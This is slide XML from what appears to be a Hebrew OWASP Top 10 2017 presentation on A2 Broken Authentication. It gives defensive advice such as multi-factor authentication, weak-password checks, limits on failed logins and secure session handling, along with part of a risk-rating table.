              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715" y="3131840"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כאשר ניתן, יישם הזדהות מבוססת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>multi-factor authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> למנוע גניבה ממוכנת של נתוני הזדהות, מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>brute force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ושימוש חוזר בנתוני הזדהות גנובים.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הימנע מהשקה או הפצה של נתוני הזדהות ברירת מחדל, בדגש על חשבונות מנהלי המערכת.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישם בדיקות סיסמאות חלשות, כגון בדיקת סיסמאות חדשות למול רשימת סיסמאות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישר קו עם אורך סיסמא, מורכבות ומדיניות החלפת סיסמאות למול </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או מדיניות סיסמאות מודרנית אחרת.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הבטח כי רישום, שחזור נתוני הזדהות, ודרכי גישה לממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) מוקשחים מפני מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> כלפי חשבונות ע"י שימוש באותן הודעות פלט לכלל ניסיונות ההזדהות, עבור כלל החשבונות.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>צמצם או האט ניסיונות הזדהות כושלים. תעד את כלל ניסיונות ההזדהות הכושלים ויידע את מנהלי המערכת בעת גילוי מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>brute force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או כל גילוי מתקפות אחרות כלפי המערכת.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>השתמש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מובנה בצד-השרת, אשר מייצר מזהי שיחה (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Session Ids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) אקראיים, לאחר כל הזדהות. אל תעביר מזהי שיחה ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, וודא כי הם מאוחסנים בצורה מאובטחת ומבוטלים לאחר הניתוק, אי-פעילות או  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>timeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  הזדהות שבורה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1529577487"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניצול: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 2</a:t>
                      </a:r>
